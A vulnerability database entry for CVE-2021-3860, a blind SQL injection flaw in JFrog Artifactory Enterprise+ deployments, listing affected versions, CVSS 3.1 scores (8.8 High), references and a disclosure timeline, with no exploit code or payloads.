Blind SQL Injection Vulnerability in JFrog Artifactory for Enterprise+ Deployments
CVE-2021-3860

8.8HIGH

Key Information:

Vendor: Jfrog
Status: Jfrog Artifactory
Vendor: CVE Published:; 20 December 2021

What is CVE-2021-3860?

JFrog Artifactory versions prior to 7.25.4 for Enterprise+ deployments are susceptible to a Blind SQL Injection vulnerability. This flaw allows low privileged authenticated users to exploit incomplete validation during SQL queries, potentially leading to unauthorized data access. It highlights the necessity for robust input validation processes to secure applications against such injection attacks.

Affected Version(s)

JFrog Artifactory JFrog Artifactory versions before 7.25.4 with E+ license < 7.25.4

JFrog Artifactory JFrog Artifactory versions before 6.23.30 with E+ license < 6.23.30

References

https://www.jfrog.com/confluence/display/JFROG/CVE-2021-3...

http://packetstormsecurity.com/files/177162/JFrog-Artifac...

CVSS V3.1

Score:

8.8

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Dec 20, 2021
Vulnerability Reserved
Oct 5, 2021

Jfrog

What is CVE-2021-3860?

Affected Version(s)

References

CVSS V3.1

Timeline